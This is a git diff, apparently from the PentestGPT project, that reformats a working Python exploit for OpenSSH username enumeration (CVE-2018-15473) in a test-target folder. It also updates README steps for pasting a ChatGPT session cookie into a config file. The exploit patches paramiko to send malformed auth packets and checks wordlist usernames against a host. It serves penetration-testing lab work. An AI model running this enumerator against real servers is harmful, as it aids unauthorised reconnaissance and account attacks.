GreyDGL
diff --git a/‎.devcontainer/targets/openssh/exploit.py
Lines changed: 114 additions & 70 deletions b/‎.devcontainer/targets/openssh/exploit.py
Lines changed: 114 additions & 70 deletions
diff --git a/‎README.md
Lines changed: 8 additions & 5 deletions b/‎README.md
Lines changed: 8 additions & 5 deletions
@@ -30,17 +30,18 @@
 
 
 class Color:
-    """ Class for coloring print statements.  Nothing to see here, move along. """
-    BOLD = '\033[1m'
-    ENDC = '\033[0m'
-    RED = '\033[38;5;196m'
-    BLUE = '\033[38;5;75m'
-    GREEN = '\033[38;5;149m'
-    YELLOW = '\033[38;5;190m'
+    """Class for coloring print statements.  Nothing to see here, move along."""
+
+    BOLD = "\033[1m"
+    ENDC = "\033[0m"
+    RED = "\033[38;5;196m"
+    BLUE = "\033[38;5;75m"
+    GREEN = "\033[38;5;149m"
+    YELLOW = "\033[38;5;190m"
 
     @staticmethod
     def string(string: str, color: str, bold: bool = False) -> str:
-        """ Prints the given string in a few different colors.
+        """Prints the given string in a few different colors.
 
         Args:
             string: string to be printed
@@ -52,57 +53,64 @@ def string(string: str, color: str, bold: bool = False) -> str:
         """
         boldstr = Color.BOLD if bold else ""
         colorstr = getattr(Color, color.upper())
-        return f'{boldstr}{colorstr}{string}{Color.ENDC}'
+        return f"{boldstr}{colorstr}{string}{Color.ENDC}"
 
 
 class InvalidUsername(Exception):
-    """ Raise when username not found via CVE-2018-15473. """
+    """Raise when username not found via CVE-2018-15473."""
 
 
 def apply_monkey_patch() -> None:
-    """ Monkey patch paramiko to send invalid SSH2_MSG_USERAUTH_REQUEST.
-
-        patches the following internal `AuthHandler` functions by updating the internal `_handler_table` dict
-            _parse_service_accept
-            _parse_userauth_failure
-
-        _handler_table = {
-            MSG_SERVICE_REQUEST: _parse_service_request,
-            MSG_SERVICE_ACCEPT: _parse_service_accept,
-            MSG_USERAUTH_REQUEST: _parse_userauth_request,
-            MSG_USERAUTH_SUCCESS: _parse_userauth_success,
-            MSG_USERAUTH_FAILURE: _parse_userauth_failure,
-            MSG_USERAUTH_BANNER: _parse_userauth_banner,
-            MSG_USERAUTH_INFO_REQUEST: _parse_userauth_info_request,
-            MSG_USERAUTH_INFO_RESPONSE: _parse_userauth_info_response,
-        }
+    """Monkey patch paramiko to send invalid SSH2_MSG_USERAUTH_REQUEST.
+
+    patches the following internal `AuthHandler` functions by updating the internal `_handler_table` dict
+        _parse_service_accept
+        _parse_userauth_failure
+
+    _handler_table = {
+        MSG_SERVICE_REQUEST: _parse_service_request,
+        MSG_SERVICE_ACCEPT: _parse_service_accept,
+        MSG_USERAUTH_REQUEST: _parse_userauth_request,
+        MSG_USERAUTH_SUCCESS: _parse_userauth_success,
+        MSG_USERAUTH_FAILURE: _parse_userauth_failure,
+        MSG_USERAUTH_BANNER: _parse_userauth_banner,
+        MSG_USERAUTH_INFO_REQUEST: _parse_userauth_info_request,
+        MSG_USERAUTH_INFO_RESPONSE: _parse_userauth_info_response,
+    }
     """
 
     def patched_add_boolean(*args, **kwargs):
-        """ Override correct behavior of paramiko.message.Message.add_boolean, used to produce malformed packets. """
+        """Override correct behavior of paramiko.message.Message.add_boolean, used to produce malformed packets."""
 
     auth_handler = paramiko.auth_handler.AuthHandler
-    old_msg_service_accept = auth_handler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT]
+    old_msg_service_accept = auth_handler._client_handler_table[
+        paramiko.common.MSG_SERVICE_ACCEPT
+    ]
 
     def patched_msg_service_accept(*args, **kwargs):
-        """ Patches paramiko.message.Message.add_boolean to produce a malformed packet. """
-        old_add_boolean, paramiko.message.Message.add_boolean = paramiko.message.Message.add_boolean, patched_add_boolean
+        """Patches paramiko.message.Message.add_boolean to produce a malformed packet."""
+        old_add_boolean, paramiko.message.Message.add_boolean = (
+            paramiko.message.Message.add_boolean,
+            patched_add_boolean,
+        )
         retval = old_msg_service_accept(*args, **kwargs)
         paramiko.message.Message.add_boolean = old_add_boolean
         return retval
 
     def patched_userauth_failure(*args, **kwargs):
-        """ Called during authentication when a username is not found. """
+        """Called during authentication when a username is not found."""
         raise InvalidUsername(*args, **kwargs)
 
-    auth_handler._client_handler_table.update({
-        paramiko.common.MSG_SERVICE_ACCEPT: patched_msg_service_accept,
-        paramiko.common.MSG_USERAUTH_FAILURE: patched_userauth_failure
-    })
+    auth_handler._client_handler_table.update(
+        {
+            paramiko.common.MSG_SERVICE_ACCEPT: patched_msg_service_accept,
+            paramiko.common.MSG_USERAUTH_FAILURE: patched_userauth_failure,
+        }
+    )
 
 
 def create_socket(hostname: str, port: int) -> Union[socket.socket, None]:
-    """ Small helper to stay DRY.
+    """Small helper to stay DRY.
 
     Returns:
         socket.socket or None
@@ -112,11 +120,13 @@ def create_socket(hostname: str, port: int) -> Union[socket.socket, None]:
     try:
         return socket.create_connection((hostname, port))
     except socket.error as e:
-        print(f'socket error: {e}', file=sys.stdout)
+        print(f"socket error: {e}", file=sys.stdout)
 
 
-def connect(username: str, hostname: str, port: int, verbose: bool = False, **kwargs) -> None:
-    """ Connect and attempt keybased auth, result interpreted to determine valid username.
+def connect(
+    username: str, hostname: str, port: int, verbose: bool = False, **kwargs
+) -> None:
+    """Connect and attempt keybased auth, result interpreted to determine valid username.
 
     Args:
         username:   username to check against the ssh service
@@ -137,7 +147,11 @@ def connect(username: str, hostname: str, port: int, verbose: bool = False, **kw
     try:
         transport.start_client()
     except paramiko.ssh_exception.SSHException:
-        return print(Color.string(f'[!] SSH negotiation failed for user {username}.', color='red'))
+        return print(
+            Color.string(
+                f"[!] SSH negotiation failed for user {username}.", color="red"
+            )
+        )
 
     try:
         transport.auth_publickey(username, paramiko.RSAKey.generate(1024))
@@ -150,54 +164,84 @@ def connect(username: str, hostname: str, port: int, verbose: bool = False, **kw
 
 
 def main(**kwargs):
-    """ main entry point for the program """
-    sock = create_socket(kwargs.get('hostname'), kwargs.get('port'))
+    """main entry point for the program"""
+    sock = create_socket(kwargs.get("hostname"), kwargs.get("port"))
     if not sock:
         return
 
     banner = sock.recv(1024).decode()
 
-    regex = re.search(r'-OpenSSH_(?P<version>\d\.\d)', banner)
+    regex = re.search(r"-OpenSSH_(?P<version>\d\.\d)", banner)
     if regex:
         try:
-            version = float(regex.group('version'))
+            version = float(regex.group("version"))
         except ValueError:
-            print(f'[!] Attempted OpenSSH version detection; version not recognized.\n[!] Found: {regex.group("version")}')
+            print(
+                f'[!] Attempted OpenSSH version detection; version not recognized.\n[!] Found: {regex.group("version")}'
+            )
         else:
-            ver_clr = 'green' if version <= 7.7 else 'red'
-            print(f"[+] {Color.string('OpenSSH', color=ver_clr)} version {Color.string(version, color=ver_clr)} found")
+            ver_clr = "green" if version <= 7.7 else "red"
+            print(
+                f"[+] {Color.string('OpenSSH', color=ver_clr)} version {Color.string(version, color=ver_clr)} found"
+            )
     else:
-        print(f'[!] Attempted OpenSSH version detection; version not recognized.\n[!] Found: {Color.string(banner, color="yellow")}')    
+        print(
+            f'[!] Attempted OpenSSH version detection; version not recognized.\n[!] Found: {Color.string(banner, color="yellow")}'
+        )
 
     apply_monkey_patch()
 
-    if kwargs.get('username'):
-        kwargs['username'] = kwargs.get('username').strip()
+    if kwargs.get("username"):
+        kwargs["username"] = kwargs.get("username").strip()
         return connect(**kwargs)
 
-    with multiprocessing.Pool(kwargs.get('threads')) as pool, Path(kwargs.get('wordlist')).open() as usernames:
-        host = kwargs.get('hostname')
-        port = kwargs.get('port')
-        verbose = kwargs.get('verbose')
-        pool.starmap(connect, [(user.strip(), host, port, verbose) for user in usernames])
-
-
-if __name__ == '__main__':
-    parser = argparse.ArgumentParser(description="OpenSSH Username Enumeration (CVE-2018-15473)")
-
-    parser.add_argument('hostname', help='target to enumerate', type=str)
-    parser.add_argument('-p', '--port', help='ssh port (default: 22)', default=22, type=int)
-    parser.add_argument('-t', '--threads', help="number of threads (default: 4)", default=4, type=int)
-    parser.add_argument('-v', '--verbose', action='store_true', default=False,
-                        help="print both valid and invalid usernames (default: False)")
-    parser.add_argument('-6', '--ipv6', action='store_true', help="Specify use of an ipv6 address (default: ipv4)")
+    with multiprocessing.Pool(kwargs.get("threads")) as pool, Path(
+        kwargs.get("wordlist")
+    ).open() as usernames:
+        host = kwargs.get("hostname")
+        port = kwargs.get("port")
+        verbose = kwargs.get("verbose")
+        pool.starmap(
+            connect, [(user.strip(), host, port, verbose) for user in usernames]
+        )
+
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(
+        description="OpenSSH Username Enumeration (CVE-2018-15473)"
+    )
+
+    parser.add_argument("hostname", help="target to enumerate", type=str)
+    parser.add_argument(
+        "-p", "--port", help="ssh port (default: 22)", default=22, type=int
+    )
+    parser.add_argument(
+        "-t", "--threads", help="number of threads (default: 4)", default=4, type=int
+    )
+    parser.add_argument(
+        "-v",
+        "--verbose",
+        action="store_true",
+        default=False,
+        help="print both valid and invalid usernames (default: False)",
+    )
+    parser.add_argument(
+        "-6",
+        "--ipv6",
+        action="store_true",
+        help="Specify use of an ipv6 address (default: ipv4)",
+    )
 
     multi_or_single_group = parser.add_mutually_exclusive_group(required=True)
-    multi_or_single_group.add_argument('-w', '--wordlist', type=str, help="path to wordlist")
-    multi_or_single_group.add_argument('-u', '--username', help='a single username to test', type=str)
+    multi_or_single_group.add_argument(
+        "-w", "--wordlist", type=str, help="path to wordlist"
+    )
+    multi_or_single_group.add_argument(
+        "-u", "--username", help="a single username to test", type=str
+    )
 
     args = parser.parse_args()
 
-    logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())
+    logging.getLogger("paramiko.transport").addHandler(logging.NullHandler())
 
-    main(**vars(args))
+    main(**vars(args))
@@ -47,6 +47,7 @@
 
 <!-- ABOUT THE PROJECT -->
 ## General Updates
+- [Update on 19/05/2023] A support to chatGPT cookie usage is added. Please read the installation section for more details.
 - [Update on 13/05/2023] I'll add more demo videos for PentestGPT. Below are the available ones:
     - **PentestGPT for OSCP-like machine: [HTB-Jarvis](https://youtu.be/lAjLIj1JT3c)**. This is the first part only, and I'll complete the rest when I have time.
     - **PentestGPT on [HTB-Lame](https://youtu.be/Vs9DFtAkODM)**. This is an easy machine, but it shows you how PentestGPT skipped the rabbit hole and worked on other potential vulnerabilities.
@@ -86,12 +87,14 @@ Before installation, we recommend you to take a look at this [installation video
 
 1. Install `requirements.txt` with `pip install -r requirements.txt`
 2. Configure the cookies in `config`. You may follow a sample by `cp config/chatgpt_config_sample.py config/chatgpt_config.py`.
-   - If you're using cookie, please watch this video: https://youtu.be/IbUcj0F9EBc. The general steps are:
-       - Login to ChatGPT session page.
+   - **If you're using cookie, please go through the following details!!!** 
+       - please watch this video: https://youtu.be/IbUcj0F9EBc. 
+       - *Use Chrome* to login to ChatGPT.
        - In `Inspect - Network`, find the connections to the ChatGPT session page. 
-       - Find the cookie in the **request header** in the request to `https://chat.openai.com/api/auth/session` and paste it into the `cookie` field of `config/chatgpt_config.py`. (You may use Inspect->Network, find session and copy the `cookie` field in `request_headers` to `https://chat.openai.com/api/auth/session`)
-       - Note that the other fields are temporarily deprecated due to the update of ChatGPT page. 
+       - Find the cookie in the **request header** in the request to `https://chat.openai.com/public-api/conversation_limit` and paste it into the `cookie` field of `config/chatgpt_config.py`. (You may use Inspect->Network, find session and copy the `cookie` field in `request_headers` to `https://chat.openai.com/public-api/conversation_limit`)
        - Fill in `userAgent` with your user agent.
+       - During the usage of PentestGPT, **You may be asked to refresh the session as cookie expired**. Please copy the request to `https://chat.openai.com/public-api/conversation_limit` as **cURL** and paste it to `config/chatgpt_config_curl.txt`. Follow the instruction and the session will be updated.
+       - Note that each cookie may work for around 30 mins.
    - If you're using API:
        - Fill in the OpenAI API key in `chatgpt_config.py`.
 3. To verify that the connection is configured properly, you may run `python3 test_connection.py`. You should see some sample conversation with ChatGPT.
@@ -104,7 +107,7 @@ Before installation, we recommend you to take a look at this [installation video
    ## Test connection for OpenAI api (GPT-3.5)
    3. You're connected with OpenAI API. You have GPT-3.5 access. To start PentestGPT, please use <python3 main.py --reasoning_model=gpt-3.5-turbo --useAPI>
    ```
-4. (Notice) The above verification process for cookie. If you encounter errors after several trials, please try to refresh the page, repeat the above steps, and try again. You may also try with the cookie to `https://chat.openai.com/backend-api/conversations`. Please submit an issue if you encounter any problem.
+5. (Notice) The above verification process for cookie. If you encounter errors after several trials, please try to refresh the page, repeat the above steps, and try again. You may also try with the cookie to `https://chat.openai.com/backend-api/conversations`. Please submit an issue if you encounter any problem.